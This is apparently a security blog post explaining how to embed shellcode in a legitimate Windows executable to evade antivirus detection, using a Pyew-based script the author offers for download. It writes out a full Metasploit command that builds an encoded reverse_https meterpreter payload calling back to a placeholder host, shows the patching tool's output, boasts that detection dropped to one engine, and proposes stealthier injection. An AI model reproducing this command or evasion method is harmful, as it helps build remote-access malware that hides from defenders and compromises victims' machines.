Some time ago a friend asked in a private mailing list about possible ways to embed a shellcode in one executable file (PE) and ways to bypass AV detection. I recommended him to use any Windows supplied PE file (or any other ‘goodware’ PE file) and patching some “always called function” with the shellcode. It turned out to be one of the many possible AV evasion techniques that seems to work in many cases. The unique problem was that there is no tool to do this, so I decided to write one tool (based on Pyew) for doing this task.
The exact command line he sent to the mailing list of the tool he was running for creating the PE with the shellcode embed was this one:
$ ./msfpayload windows/meterpreter/reverse_https LHOST=www.xxx.com LPORT=666 R | ./msfencode -t raw -e x86/shikata_ga_nai -c 5 | ./msfencode -t raw -e x86/alpha_upper -c 2 | ./msfencode -t raw -e x86/shikata_ga_nai -c 5 | ./msfencode -t exe -c 5 -e x86/countdown -o xxx.exe
A file created like this was easily detected by many AV engines as you may see here. In the VirusTotal report, you will notice that 30 out of 42 AV engines detected this sample. However, using the tool I created based on Pyew to embed the shellcode in a PE file it changes a “bit”. In this case, only one AV engine detects “something”: eSafe says there is a “Virus in password protected archive”. The following is the output of running the tool I wrote:
$ python shellcode_patch.py test/files/sample.exe msf/xxx.sc test/files/out.exe
[+] Loading and analysing file test/files/sample.exe PE Information Sections: .text 0x1000 0x5e70 24576 .rdata 0x7000 0x3b4a 16384 .data 0xb000 0x2a60 8192 .rsrc 0xe000 0x1258 8192 Entry Point at 0x6cdf Virtual Address is 0x406cdf Code Analysis ... Analyzing address 0x00006e5f - 0 in queue / 57 totall [i] Total of 57 function(s) found in PE file [i] Entry point function start at 0x00006cdf [i] Function at offset 0x00003be8 will be patched [+] Writing output file test/files/out.exe [+] All finished!
You may download the script I wrote for Pyew here. But, obviously, it requires Pyew in order to run (you need to download the latest version from the Mercurial repository as it required to do some changes to code analysis engine as well as adding support for calculating the callgraph and all the flowgraphs). This easy script receives 3 arguments: the base PE file, the shellcode to embed and an output file. The tool loads the initial PE file, performs code analysis, finds a random function that is called from the entry point following some path, overwrites this function, changes the PE section’s privilege accordingly (the shellcode will probably need to write data in this section) and writes the output file. And that’s all! It’s ~100 lines of code but with many checks and comments.
Possible future improvements
This is a quick script for doing this task. However, a more powefull one could be written with little effort. For example, instead of completely overwriting a function, we could embed the shellcode in the holes between functions and patch one function’s prolog to call the shellcode and then return to the original function, for example.
Remember: If you want to use this tool you need to download the latest Pyew version from the Mercurial’s repository.